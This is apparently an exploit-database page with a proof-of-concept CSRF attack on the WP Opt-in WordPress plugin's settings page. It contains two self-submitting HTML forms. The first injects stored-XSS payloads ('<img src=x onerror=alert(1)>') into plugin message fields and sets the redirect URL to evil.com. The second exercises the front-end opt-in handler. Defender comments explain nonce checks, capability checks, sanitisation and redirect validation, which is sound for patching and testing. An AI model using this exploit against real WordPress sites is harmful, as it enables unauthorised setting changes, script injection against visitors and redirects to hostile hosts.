## https://sploitus.com/exploit?id=WPEX-ID:46B634F6-92BC-4E00-A4C0-C25135C61922
<!--
  Proof of concept: cross-site request forgery (CSRF) against the settings
  page of the WP Opt-in plugin (options-general.php?page=wp-opt-in/wp-opt-in.php).
  The form posts a set of wpoi_* settings and contains no WordPress nonce
  field (no _wpnonce), and the script below submits it as soon as it runs.
  The request is accepted only if the settings handler does not verify a
  per-user token, so the absence of that check is the defect being shown.

  Defender notes:
  - Fix in the handler: emit wp_nonce_field() in the settings form, call
    check_admin_referer() before saving, and require
    current_user_can('manage_options').
  - Sanitise on save (sanitize_email, sanitize_text_field, wp_kses_post,
    esc_url_raw) and escape on output (esc_html, esc_attr, wp_kses_post).
  - Review: POST requests to this settings URL whose Origin/Referer is not
    the site itself, and stored plugin settings that contain event-handler
    markup or an unexpected redirect URL.
-->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-opt-in%2Fwp-opt-in.php" method="POST">
<!-- Presumably the marker the plugin uses to recognise a settings submission;
     it is a value the forged page supplies itself, not an anti-CSRF token.
     TODO confirm against the plugin source. -->
<input type="text" name="wpoi_hidden" value="SAb13c">
<!-- E-mail settings: sender, subject and body of the message the plugin sends. -->
<input type="text" name="wpoi_email_from" value="test@example.com">
<input type="text" name="wpoi_email_subject" value="[example.com] Requested e-mail">
<input type="text" name="wpoi_email_message" value="hacked">
<input type="text" name="wpoi_email_notify" value="">
<!-- Status messages and form fragments. These fields carry raw HTML, so the
     plugin presumably prints them unescaped on the front end. -->
<input type="text" name="wpoi_msg_bad" value="<p><b>Bad e-mail address.</b></p>">
<input type="text" name="wpoi_msg_fail" value="<p><b>Failed sending to e-mail address.</b></p>">
<!-- The next two values are harmless alert(1) markers. If they are stored and
     later rendered without escaping, the CSRF becomes stored cross-site
     scripting; filtering these settings with wp_kses_post() on save and on
     output removes the event-handler attribute. -->
<input type="text" name="wpoi_msg_sent" value="<img src=x onerror=alert(1)>">
<input type="text" name="wpoi_form_header" value="<img src=x onerror=alert(1)>">
<input type="text" name="wpoi_form_footer" value="</div>">
<input type="text" name="wpoi_form_email" value="E-mail:">
<input type="text" name="wpoi_form_send" value="Submit">
<!-- Redirect setting pointed at an external host (open-redirect marker).
     Redirect targets should be validated with wp_validate_redirect() or
     issued through wp_safe_redirect(). -->
<input type="text" name="wpoi_url_redir" value="https://evil.com">
<!-- NOTE(review): the trailing characters of this value look like an encoding
     artefact of the page capture rather than the intended button label. -->
<input type="text" name="Submit" value="Update Options ยป">
</form>
<script>
// Submits the form without any user interaction. A server-side nonce check
// rejects this request, because the forged page cannot know the per-user token.
document.getElementById("test").submit();
</script>
<!--
  Second request of the proof of concept: posts an e-mail address as
  wpoi_email to a front-end URL. /asasas is presumably a placeholder for a
  page that renders the opt-in form, so this request exercises the plugin's
  front-end handler with whatever settings are currently stored (status
  message markup, redirect URL). TODO confirm against the plugin source.

  NOTE(review): this form reuses id="test" from the settings form earlier on
  the page. Ids must be unique within a document, so the two snippets are
  presumably meant as separate files.

  Defender note: the front-end handler should escape the stored messages on
  output and validate the redirect target, so that a tampered setting cannot
  reach visitors even if it was saved.
-->
<form id="test" action="https://example.com/asasas" method="POST">
<input type="text" name="wpoi_email" value="test@example.com">
</form>
<script>
// Submits the opt-in form without user interaction.
document.getElementById("test").submit();
</script>